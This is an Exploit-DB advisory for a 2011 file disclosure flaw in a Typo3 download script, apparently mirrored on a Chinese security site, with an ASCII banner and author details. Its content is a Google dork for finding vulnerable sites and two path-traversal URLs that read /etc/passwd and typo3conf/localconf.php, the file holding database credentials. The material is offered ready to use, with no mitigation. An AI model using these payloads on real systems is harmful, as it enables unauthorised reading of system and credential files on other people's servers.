Typo3 – File Disclosure - 体验盒子 - 不再关注网络安全

作者： Number 7

日期： 2011-09-29

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/17905/

 ________________________________________________________________________________________
| __|
| ||\\|| || || | \\// |____________ __________|
| || \\ || || || | |\\//| | | \ |______| |_______/ /|
| ||\\|| || || | | \\// | | |_ \| | / / |
| || \\ || || || | |\\//| | | |_)|| |______/\`'__\ / /|
| ||\\|| || || | | \\// | | |_< |______| \ \ \/ / / |
| || \\ || ||_______|| | |\\//| | | |_)|| |______ \ \_\/ /|
| ||\\|| |_________| |_| \/ |_| |_____/ |________| \/_/ /_/ |
|_________________________________________________________________________________________|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Exploit Title: [Typo3 File Disclosure]
# Google Dork: [inurl:"/fileadmin/download.php?Fichier_a_telecharger=*"]
# Date: [29/09/2011]
# Author: [Number 7]
# Contact :spam[-]tn[.]cs[@]live[.]fr
# Software Link: [http://typo3.org/]
# Tested on: [linux]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://127.0.0.1/fileadmin/download.php?Fichier_a_telecharger=../../../../../etc/passwd

http://localhost/path/fileadmin/download.php?Fichier_a_telecharger=../typo3conf/localconf.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Made In Tunisia // Kairouan // Mansoura City :D